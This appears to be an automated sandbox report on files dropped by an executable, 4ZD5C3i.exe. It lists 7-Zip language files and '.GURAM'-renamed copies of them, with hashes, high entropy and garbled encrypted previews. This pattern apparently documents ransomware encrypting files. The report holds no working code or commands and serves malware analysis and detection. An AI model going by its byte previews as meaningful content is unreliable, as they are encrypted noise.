                                                                                                                                                                                                                                                C:\Program Files\7-Zip\Lang\ga.txt

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):8918
                                                                                                                                                                                                                                                Entropy (8bit):7.976327836759647
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:192:fqeFImC0u9OPxgCq+zkSiR+Tag1UpQnZUS06/dq8foBqc8oIA9U+:fUN0u9OPxgCq+zP7T5FGS0VBqhPAy+
                                                                                                                                                                                                                                                MD5:75ECF6E8A0ED397E23E6D583A7DF43AD
                                                                                                                                                                                                                                                SHA1:BFE75234EC2F2524C5F7C755DFAC13B7DBC0473C
                                                                                                                                                                                                                                                SHA-256:D5B3A309E824C940BB35C7A658468C18F365241CCC9BC764920FCCF166FF7AA0
                                                                                                                                                                                                                                                SHA-512:C9821EF386F36AFB1D06AC6A2B79D722F795E5AE5CF86F0E9B2F0CD1249F1B258DF23B1BB312571F2E51B19D94A6E1A6C78B63D28A15B04B8FA3ED64D8785A00
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:..&.[{_.-W![......bcI\.....Q....K;X...d.a$...._.w0S.R..G,.>O....Xs..v_..v.dO.x../..'.R.$t..!...rC.qa....*..1;.:h:......'3V..e.5..%.&4I...".'e.@.>/*......3.2hA..x%H.#5o.-..P]...-_.#o.....(....>..X..Fv#...U[.....?3r./...1..2.....<Hq.W.!k.....Y...d.;~..u]N ..Z.w{.{...y..>.C..<Y.5./V..lb.o+.....%..R...../DZ.C.C..0M..v..&O..=...G.....O2.d^.X...X...u7.l.......:.42'..-...V.;..M, .8.W..n..W.Y...X...._.u..V=08....k.....{.m./.O..k....=.....h*.8.Ol|.V......P..N..=.. 6...i...v..4.".F.7..J..!aT....O..y.#...5.....#L..B...&t.."..z.*.hBE}P......e....t....PP..[....u.........<..&..:...Q....bqq.o..`..(.V.)..>...j>0..?.-.....*.<md$LB...-.P{...6B.[..Y.duA+...).."e#.....jR.+....S%.)....#]..+kV..M.{5.:..:..@._G..1.K.*y.6...(.K.2...F....0.@0....0...+}...F..E^..6W.g.N|...5.#..DHk.Q..!.U...C..O.....6...W....wsH..G....z.[g.5....YX.7..N.0_}9s.JA.k..[.....z.T.Ju..%.P.Y...=.A.T^......k....K........{.&K.h>)@...1l3..+..|^.!.......Q....bVp.....:>.nB.o..9...k.

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\Lang\ga.txt.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):8918
                                                                                                                                                                                                                                                Entropy (8bit):7.976327836759647
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:192:fqeFImC0u9OPxgCq+zkSiR+Tag1UpQnZUS06/dq8foBqc8oIA9U+:fUN0u9OPxgCq+zP7T5FGS0VBqhPAy+
                                                                                                                                                                                                                                                MD5:75ECF6E8A0ED397E23E6D583A7DF43AD
                                                                                                                                                                                                                                                SHA1:BFE75234EC2F2524C5F7C755DFAC13B7DBC0473C
                                                                                                                                                                                                                                                SHA-256:D5B3A309E824C940BB35C7A658468C18F365241CCC9BC764920FCCF166FF7AA0
                                                                                                                                                                                                                                                SHA-512:C9821EF386F36AFB1D06AC6A2B79D722F795E5AE5CF86F0E9B2F0CD1249F1B258DF23B1BB312571F2E51B19D94A6E1A6C78B63D28A15B04B8FA3ED64D8785A00
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:..&.[{_.-W![......bcI\.....Q....K;X...d.a$...._.w0S.R..G,.>O....Xs..v_..v.dO.x../..'.R.$t..!...rC.qa....*..1;.:h:......'3V..e.5..%.&4I...".'e.@.>/*......3.2hA..x%H.#5o.-..P]...-_.#o.....(....>..X..Fv#...U[.....?3r./...1..2.....<Hq.W.!k.....Y...d.;~..u]N ..Z.w{.{...y..>.C..<Y.5./V..lb.o+.....%..R...../DZ.C.C..0M..v..&O..=...G.....O2.d^.X...X...u7.l.......:.42'..-...V.;..M, .8.W..n..W.Y...X...._.u..V=08....k.....{.m./.O..k....=.....h*.8.Ol|.V......P..N..=.. 6...i...v..4.".F.7..J..!aT....O..y.#...5.....#L..B...&t.."..z.*.hBE}P......e....t....PP..[....u.........<..&..:...Q....bqq.o..`..(.V.)..>...j>0..?.-.....*.<md$LB...-.P{...6B.[..Y.duA+...).."e#.....jR.+....S%.)....#]..+kV..M.{5.:..:..@._G..1.K.*y.6...(.K.2...F....0.@0....0...+}...F..E^..6W.g.N|...5.#..DHk.Q..!.U...C..O.....6...W....wsH..G....z.[g.5....YX.7..N.0_}9s.JA.k..[.....z.T.Ju..%.P.Y...=.A.T^......k....K........{.&K.h>)@...1l3..+..|^.!.......Q....bVp.....:>.nB.o..9...k.

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\Lang\gl.txt

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):10221
                                                                                                                                                                                                                                                Entropy (8bit):7.982311049888527
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:192:WJfKWfjn5i9e2MVvIye48jxKf/fO/OmZQRkwxkIusJRJ4X3T+GSXf4m2hEUJ:mCU5JDvQ48lU/fOhqRknOJRJ4yPN8LJ
                                                                                                                                                                                                                                                MD5:C33D1BAFA5F772A7A6505D60213EC8D6
                                                                                                                                                                                                                                                SHA1:9BD81BA8A821DE23A1337F8CF5F939D939084F30
                                                                                                                                                                                                                                                SHA-256:022BC718A1FC7DA19E40C085A6F06E2543FB1816814A6C6637D187462B07394B
                                                                                                                                                                                                                                                SHA-512:138CBEF0A372598770402CCDD91C63D84898B2D24AFE3616FDAEAB03095E3B41C691782F7980A5E7771282659AE06F3876DA63D0A2737DF6974B86C194B2FBB4
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.......g..9....O..@..._...q....m.y..WI.ip.q......V!S..)4.c..K.&.A...x..=...z<R..Jk..)...i....T..i........?..=.E.1.S....1....P.l.X.2T8..,.t.k.-..}.....&t..lD...I.O.O....-...X.\..O}.....M.m.a.*...#{T\.;...77.,."...u:$M....D.......= Ez.(.g..w.^.F..k.....4..m..?....B6...ou..m].3..r.=....w.+e.Ab.W..9.."...E.1..!....ew........(.....n..YZE...w:p.~.5..c......?..\.Y..y.=.=..ec.{.d....T.j.r...p.m;../.].....a..W..._..N?..Ru#P..2e..*.3\.1E...e..F.$.......|..g1.96...D....j.r..........?.PyR.2.%......~..^..yM..^..[..o.V.[....\...h.f.%_^..m..?~..._.U../.2$..o...>....SpI=.../.f.Z..z5.{.`..l..H`X..W.'q)...j.D...W..Px.U...L;.....H.x..Q...L^..O>[<t....&KB"J.../...:....N...t+.....z...g9....Y3........x./"d.F..?...['.D7.k...gHS....../.O.'.......h..=.|.......Q.]Eq..@s".Q!4L.{=...c'...D.@C...55Qi.,..U.D.8.3..E..........M.-.......u~.d.'..............2...x..:.....}......){O..dOu...w.'...!.D....U.,9............f4..S.U}.g]....-.>.SW^f....%.....(..rg.;.N.C.H._\..5

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\Lang\gl.txt.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):10221
                                                                                                                                                                                                                                                Entropy (8bit):7.982311049888527
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:192:WJfKWfjn5i9e2MVvIye48jxKf/fO/OmZQRkwxkIusJRJ4X3T+GSXf4m2hEUJ:mCU5JDvQ48lU/fOhqRknOJRJ4yPN8LJ
                                                                                                                                                                                                                                                MD5:C33D1BAFA5F772A7A6505D60213EC8D6
                                                                                                                                                                                                                                                SHA1:9BD81BA8A821DE23A1337F8CF5F939D939084F30
                                                                                                                                                                                                                                                SHA-256:022BC718A1FC7DA19E40C085A6F06E2543FB1816814A6C6637D187462B07394B
                                                                                                                                                                                                                                                SHA-512:138CBEF0A372598770402CCDD91C63D84898B2D24AFE3616FDAEAB03095E3B41C691782F7980A5E7771282659AE06F3876DA63D0A2737DF6974B86C194B2FBB4
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.......g..9....O..@..._...q....m.y..WI.ip.q......V!S..)4.c..K.&.A...x..=...z<R..Jk..)...i....T..i........?..=.E.1.S....1....P.l.X.2T8..,.t.k.-..}.....&t..lD...I.O.O....-...X.\..O}.....M.m.a.*...#{T\.;...77.,."...u:$M....D.......= Ez.(.g..w.^.F..k.....4..m..?....B6...ou..m].3..r.=....w.+e.Ab.W..9.."...E.1..!....ew........(.....n..YZE...w:p.~.5..c......?..\.Y..y.=.=..ec.{.d....T.j.r...p.m;../.].....a..W..._..N?..Ru#P..2e..*.3\.1E...e..F.$.......|..g1.96...D....j.r..........?.PyR.2.%......~..^..yM..^..[..o.V.[....\...h.f.%_^..m..?~..._.U../.2$..o...>....SpI=.../.f.Z..z5.{.`..l..H`X..W.'q)...j.D...W..Px.U...L;.....H.x..Q...L^..O>[<t....&KB"J.../...:....N...t+.....z...g9....Y3........x./"d.F..?...['.D7.k...gHS....../.O.'.......h..=.|.......Q.]Eq..@s".Q!4L.{=...c'...D.@C...55Qi.,..U.D.8.3..E..........M.-.......u~.d.'..............2...x..:.....}......){O..dOu...w.'...!.D....U.,9............f4..S.U}.g]....-.>.SW^f....%.....(..rg.;.N.C.H._\..5

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\Lang\gu.txt

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):18377
                                                                                                                                                                                                                                                Entropy (8bit):7.987355719488689
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:384:lKukOiGPqtKHatIApEELf6BTmmO5zw+A9AiXAkGM5UtCGZQtfc:BkOnCYHLE6Bym+AuihcCGUc
                                                                                                                                                                                                                                                MD5:4A2530A1B60CB61FB7D75655D0805F05
                                                                                                                                                                                                                                                SHA1:06F8C4F16FF075797388EBF2D3F5C9BC5D9EB082
                                                                                                                                                                                                                                                SHA-256:D42133368510EC7B916E2E0390BAD32B9AE7A442B1978DA0CC5BD21A87A94A3D
                                                                                                                                                                                                                                                SHA-512:E302E16BCFA5987B1C0BB78FAB53AD720DDAEB7C3920DEA89E5BDAEE8F566C4BC95EF343104128EDF2168182186783CB0F088AE0AB6D291FE6C75547D43C8392
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.T*...5..r..^......SJ.~..QK....%....;....v.!.9.M....u....R..jY.p..4.>U....ND.1.....Q......0......A.E/..>"..}KI@.?9..!z...Z.....jY_d......Z.A.....1.A..I.;Y...mv...r. M.D..q....Q;.9........oo.Zg.. *e@."..+t.+q.:..Q!..3r'0..!..v(R*......(...u.WC.+....6+..J..=.4@..r.y....>...2.U@'/.H&T..r. ...45....`a..3.......<n.O.9"`.jE...1.B"\.&.=...U8r....:.EV...a.b...mE...[..m3...%...+:n....C.2E.%_c.6G.s....y.r.."..hO?&..U....G..l<..g.B..^.F".'...lcHo....+a...R..wZ'.]>...8._ v.;HK........+..}2...oy.P.-.:..;..2..[.}0..vSJ.../...2N.~..h.h....Smy..........zoIcB/X9.u@0G+....,T.!.?e;.I.].N.7d.....D.e'....q..W...>_B...MWIe..&.K.,L...9=Gn...{...v.$......Qh$`~.&sSd......uj...X.O. .......{9.....6...@+.......m]'D.p..O....&...g.B7.Z....4.....Y....(Kly.pu.\f-={S.]9..J.-`...<O*g.$^)..$..x.h..gz....D.../.<...5.\.nu....g....(^2.S..r"$S.+iZJ...A?$H.pq;...K....~.8."x%...F....iH@.......P.&..;U4.i.....I.T6.S....'.j8o.z.gO..8..|....8.........=o/@..X..Og.3$pqh..T.p%=_6~-a..6

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\Lang\gu.txt.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):18377
                                                                                                                                                                                                                                                Entropy (8bit):7.987355719488689
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:384:lKukOiGPqtKHatIApEELf6BTmmO5zw+A9AiXAkGM5UtCGZQtfc:BkOnCYHLE6Bym+AuihcCGUc
                                                                                                                                                                                                                                                MD5:4A2530A1B60CB61FB7D75655D0805F05
                                                                                                                                                                                                                                                SHA1:06F8C4F16FF075797388EBF2D3F5C9BC5D9EB082
                                                                                                                                                                                                                                                SHA-256:D42133368510EC7B916E2E0390BAD32B9AE7A442B1978DA0CC5BD21A87A94A3D
                                                                                                                                                                                                                                                SHA-512:E302E16BCFA5987B1C0BB78FAB53AD720DDAEB7C3920DEA89E5BDAEE8F566C4BC95EF343104128EDF2168182186783CB0F088AE0AB6D291FE6C75547D43C8392
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.T*...5..r..^......SJ.~..QK....%....;....v.!.9.M....u....R..jY.p..4.>U....ND.1.....Q......0......A.E/..>"..}KI@.?9..!z...Z.....jY_d......Z.A.....1.A..I.;Y...mv...r. M.D..q....Q;.9........oo.Zg.. *e@."..+t.+q.:..Q!..3r'0..!..v(R*......(...u.WC.+....6+..J..=.4@..r.y....>...2.U@'/.H&T..r. ...45....`a..3.......<n.O.9"`.jE...1.B"\.&.=...U8r....:.EV...a.b...mE...[..m3...%...+:n....C.2E.%_c.6G.s....y.r.."..hO?&..U....G..l<..g.B..^.F".'...lcHo....+a...R..wZ'.]>...8._ v.;HK........+..}2...oy.P.-.:..;..2..[.}0..vSJ.../...2N.~..h.h....Smy..........zoIcB/X9.u@0G+....,T.!.?e;.I.].N.7d.....D.e'....q..W...>_B...MWIe..&.K.,L...9=Gn...{...v.$......Qh$`~.&sSd......uj...X.O. .......{9.....6...@+.......m]'D.p..O....&...g.B7.Z....4.....Y....(Kly.pu.\f-={S.]9..J.-`...<O*g.$^)..$..x.h..gz....D.../.<...5.\.nu....g....(^2.S..r"$S.+iZJ...A?$H.pq;...K....~.8."x%...F....iH@.......P.&..;U4.i.....I.T6.S....'.j8o.z.gO..8..|....8.........=o/@..X..Og.3$pqh..T.p%=_6~-a..6

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\Lang\he.txt

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:OpenPGP Public Key
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):12012
                                                                                                                                                                                                                                                Entropy (8bit):7.982997982612072
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:192:CpTONx0Sq2wgaMMzB98l7/1ZDf6P+TxTiZXCzae44VDvXnZtTc6KDSVyynU6:STONx0OcMMH2z1NSWQCL/8Z8yr6
                                                                                                                                                                                                                                                MD5:AA22FE29D9AD5619C589E115F0E3FBB8
                                                                                                                                                                                                                                                SHA1:67970EBBAE3E408133BD59099D2220079A53DCA3
                                                                                                                                                                                                                                                SHA-256:22146B96EEFD8D357E6D72A081F9A190A00624156FFC7D5F6E53487E2A02E245
                                                                                                                                                                                                                                                SHA-512:E3B6522B762EFABDBFF18DB2F1B8BB487B47C100CAF8900013C2A8CA898C74D10A77D479F6A4E78E0617A9827C12EB5B19677C8DDF650C3EDF13CEF991B9D7F0
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:..MH......]p|`....qA.....'..:\:{......1G.q.... Q$..X...s57.]...s.....Yr...P...p.\.H.${h..);Pz.Dy.*u...~...X!JO....".3].~..,.PY.,.Mt.~.t.y....../.P.K.&...F.c"...`B.*S....g..4.R>.Q.....jYV."-F.....}......:....X>.,M..`.;. 4h5....>.%*|;....J..~?E<%4.f].`.............Y....4.;R...9. ..=....'.W.D..%p.]&.3...O.Pp.4H....E...7[..Q.....l9AT.{w.+......=}........{M....fph.C....<....SuY....;N.)......F......H(..K...8.....x*.HxOD..+....1W.._..,.2.[..O....,9......o.[*Y.|.[O.".8%.3.8.|-'_.y..~...P.;.@..d.F;P....p.'......m...=.T...eI.p.6.U2.....!..L.2XI~.=..tN....K.).{r..a...&ch7....e..s!?.`..l..j...s..5.V."ty..X.@Z.....)t ...].=.l0.J..'.2...;.J..x.ur\.Or.~..Pr.E=.(.....~.....CV'H.%.)V......k..K_SD...o.N3.9_....."r..K.....&./.......W...e.G...W.v....V.Be.....F .@xJ..t^....n...( .3F./..r#K.<Z..^.pXzS........4..r....3.Y.0Z...B..N.\)....g..y.,.../.2....0..{..#....Y.....,.\......X.v((.../..ft..h.XQO..|....pX....".4.....7.]......_..;.&:N.x..4....FMX.e...*5`H.5\...(

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\Lang\he.txt.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:OpenPGP Public Key
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):12012
                                                                                                                                                                                                                                                Entropy (8bit):7.982997982612072
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:192:CpTONx0Sq2wgaMMzB98l7/1ZDf6P+TxTiZXCzae44VDvXnZtTc6KDSVyynU6:STONx0OcMMH2z1NSWQCL/8Z8yr6
                                                                                                                                                                                                                                                MD5:AA22FE29D9AD5619C589E115F0E3FBB8
                                                                                                                                                                                                                                                SHA1:67970EBBAE3E408133BD59099D2220079A53DCA3
                                                                                                                                                                                                                                                SHA-256:22146B96EEFD8D357E6D72A081F9A190A00624156FFC7D5F6E53487E2A02E245
                                                                                                                                                                                                                                                SHA-512:E3B6522B762EFABDBFF18DB2F1B8BB487B47C100CAF8900013C2A8CA898C74D10A77D479F6A4E78E0617A9827C12EB5B19677C8DDF650C3EDF13CEF991B9D7F0
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:..MH......]p|`....qA.....'..:\:{......1G.q.... Q$..X...s57.]...s.....Yr...P...p.\.H.${h..);Pz.Dy.*u...~...X!JO....".3].~..,.PY.,.Mt.~.t.y....../.P.K.&...F.c"...`B.*S....g..4.R>.Q.....jYV."-F.....}......:....X>.,M..`.;. 4h5....>.%*|;....J..~?E<%4.f].`.............Y....4.;R...9. ..=....'.W.D..%p.]&.3...O.Pp.4H....E...7[..Q.....l9AT.{w.+......=}........{M....fph.C....<....SuY....;N.)......F......H(..K...8.....x*.HxOD..+....1W.._..,.2.[..O....,9......o.[*Y.|.[O.".8%.3.8.|-'_.y..~...P.;.@..d.F;P....p.'......m...=.T...eI.p.6.U2.....!..L.2XI~.=..tN....K.).{r..a...&ch7....e..s!?.`..l..j...s..5.V."ty..X.@Z.....)t ...].=.l0.J..'.2...;.J..x.ur\.Or.~..Pr.E=.(.....~.....CV'H.%.)V......k..K_SD...o.N3.9_....."r..K.....&./.......W...e.G...W.v....V.Be.....F .@xJ..t^....n...( .3F./..r#K.<Z..^.pXzS........4..r....3.Y.0Z...B..N.\)....g..y.,.../.2....0..{..#....Y.....,.\......X.v((.../..ft..h.XQO..|....pX....".4.....7.]......_..;.&:N.x..4....FMX.e...*5`H.5\...(

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\Lang\hi.txt

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):18479
                                                                                                                                                                                                                                                Entropy (8bit):7.990736768261444
                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                SSDEEP:384:qecQ6AvMiBZABgNcSQG4EfsI8yp3Wqc6F/8oqaP8t0uSkB:xR6AvNZ+Sz4E0X03Wq1F/VyvSkB
                                                                                                                                                                                                                                                MD5:C2C48CA92B0CBD3C750FE27CE964E1F9
                                                                                                                                                                                                                                                SHA1:3370D85C829BBE0ECFF639DE3BAF9FEB1AADABF6
                                                                                                                                                                                                                                                SHA-256:B8B2E578259B4CA9CDF300504A378E66D836C14F50B7D8081E257A000AEB19C6
                                                                                                                                                                                                                                                SHA-512:D5DC7F7EF6038A75D6899E25026BE3A17791139E0E2CFE84C0569C57CEDD6C4DBF10A4DD2F3ACD6120D0EBA17A4404DFD17E0BE7455E18DD29D67A33812C8AA4
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:..n..1:...E....l;..h....;..-.~....}.P...+~.H=.i.9$P./.y..1......SRn..oR..b.....,...B.n...`|Tv..Gn}...Yk.U.i..A..y.....;}...Z.~.....6.j.....@..L...]E<y...,%.Yp..n.E....P. ).6..b....!...M!.C.z..J_..d..JeM.H.Hm..Wq..1..^.Q..W`.i..8......;O.R<`....1.|...X.b..I..u.P..j.Unu0...|...i...~.^...........0...H....K.F...Y....FK...I.((..J..}..@..e..Q.].t5.*.pv$K..}.{La...kP.cD}.I/.KF..%...f..1.@......n./$........$.0.....?E5..vX^SX...X....x.D..H.F..ew.....P{Vz..M.W9...&..g6.`w.Z...U...Cnu....V......./nO[]O...Q,.s5P.L....1......9;).....~..Zk..d.....8\.....h.rV...q=..+dK~.... .z.7:.d3.:.....F..<...5.Wc....i.......c..O.....9,7.-.C..2...V.A?..@....._..../.Y....%Q...kc....7.....5.W....E^.H...[|.o.Pm......(..e'..3..._....in@P.O...d....w."f.{.IG..h.,.xs..jT0.a.._i.\.....p.....v_..V....m...O.g..'./.Sy.p1 .3....E/.km.afNh..rh.h6.q.>zR.....^...eZ^}j.0oR..c..P...O..}...4m...im...........4Kmob.D;.......SS.o...&...!........nc0......6P.'..N.E.....Pu.q...

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\Lang\hi.txt.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):18479
                                                                                                                                                                                                                                                Entropy (8bit):7.990736768261444
                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                SSDEEP:384:qecQ6AvMiBZABgNcSQG4EfsI8yp3Wqc6F/8oqaP8t0uSkB:xR6AvNZ+Sz4E0X03Wq1F/VyvSkB
                                                                                                                                                                                                                                                MD5:C2C48CA92B0CBD3C750FE27CE964E1F9
                                                                                                                                                                                                                                                SHA1:3370D85C829BBE0ECFF639DE3BAF9FEB1AADABF6
                                                                                                                                                                                                                                                SHA-256:B8B2E578259B4CA9CDF300504A378E66D836C14F50B7D8081E257A000AEB19C6
                                                                                                                                                                                                                                                SHA-512:D5DC7F7EF6038A75D6899E25026BE3A17791139E0E2CFE84C0569C57CEDD6C4DBF10A4DD2F3ACD6120D0EBA17A4404DFD17E0BE7455E18DD29D67A33812C8AA4
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:..n..1:...E....l;..h....;..-.~....}.P...+~.H=.i.9$P./.y..1......SRn..oR..b.....,...B.n...`|Tv..Gn}...Yk.U.i..A..y.....;}...Z.~.....6.j.....@..L...]E<y...,%.Yp..n.E....P. ).6..b....!...M!.C.z..J_..d..JeM.H.Hm..Wq..1..^.Q..W`.i..8......;O.R<`....1.|...X.b..I..u.P..j.Unu0...|...i...~.^...........0...H....K.F...Y....FK...I.((..J..}..@..e..Q.].t5.*.pv$K..}.{La...kP.cD}.I/.KF..%...f..1.@......n./$........$.0.....?E5..vX^SX...X....x.D..H.F..ew.....P{Vz..M.W9...&..g6.`w.Z...U...Cnu....V......./nO[]O...Q,.s5P.L....1......9;).....~..Zk..d.....8\.....h.rV...q=..+dK~.... .z.7:.d3.:.....F..<...5.Wc....i.......c..O.....9,7.-.C..2...V.A?..@....._..../.Y....%Q...kc....7.....5.W....E^.H...[|.o.Pm......(..e'..3..._....in@P.O...d....w."f.{.IG..h.,.xs..jT0.a.._i.\.....p.....v_..V....m...O.g..'./.Sy.p1 .3....E/.km.afNh..rh.h6.q.>zR.....^...eZ^}j.0oR..c..P...O..}...4m...im...........4Kmob.D;.......SS.o...&...!........nc0......6P.'..N.E.....Pu.q...

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\Lang\hr.txt

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):9225
                                                                                                                                                                                                                                                Entropy (8bit):7.982404516450799
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:192:roe38J8Eby7OJdOycAzJuZzhXZyEYANMvNWIHoc/A2zDAggMNYpXAuRUQ:Ue38OZ7WJzOhXZJNH+5DAgg73WQ
                                                                                                                                                                                                                                                MD5:17F2730983D1064022A282EC22C1715A
                                                                                                                                                                                                                                                SHA1:23FB995CB13657F2B4C4362AC04C26DFC60A6D20
                                                                                                                                                                                                                                                SHA-256:CC7049E0D45AC70657603E76607519300F0B4DF7F6226D35B96D62E982EF4298
                                                                                                                                                                                                                                                SHA-512:FD1660886B3184D2D8D05A9FC97F19F1BDBB70A2F0B78737479F4D570E12DC3C4A89F11412E17EAD67ADBDF872D68E0E97DCCDB03C034B03F7607925AB6E946C
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.Bpjr..p.R.l.Z.8yk`..>.T}...X.......I..d.f.G..>.......u.8'...Xx..=o...`.Y.t.`..b.+N....7@..h..b.:....z2Y....V....r..7....om.P.......A..4....y..4.....].....g.t.D..F..$%.`+.D$..+.uN...8G.o...i.W:..eI.&...A....a..d.....c3.Y..............HL}......+.Yq0..........f......yQ..T.M....6.r..A0Vi.n... ....o.);.U.z4.W..%...S..n..N*...e.......z.B...@...0.f.3....#.>.......V.LJ@.x6.. .0......z.,.pf~I..,.$u.l.,....h.:..!...3.Q...%.C...8-..O.U}k........./M....L$..L..."z..S^.......u/......q..C2.......3`J.@..].m.~.i.g].W...../m..NQti.6{0.@:.....z...1.b?.!0rK....Hw.D7....w..&.,........%.h0..}.6.-,..r./Y.pGy.[o...!.}....<JpU.|..V...b..'..VQ.2.``......1%..%quw4H.....H.....<..>D...&.4..FB|............"....`.)..6..).....\....6.5QH......^.....C.v...V.....*.......qw4!`....()[..{...y.~v..2...".9.K.".mP.I.0.}..A#o...Hg.BFu..i..w.*.Y.+......zX/...Y..-.'.u.~...s....T.a.6...~Y.%....6(..qY......$..MZ..6..~..I..6.AU6..NK@C.-.....oWYFg.Cd.-..T...=.+....u.Ug....E...ih.%..!M.

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\Lang\hr.txt.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):9225
                                                                                                                                                                                                                                                Entropy (8bit):7.982404516450799
                                                                                                                                                                                                                                                Encrypted:false
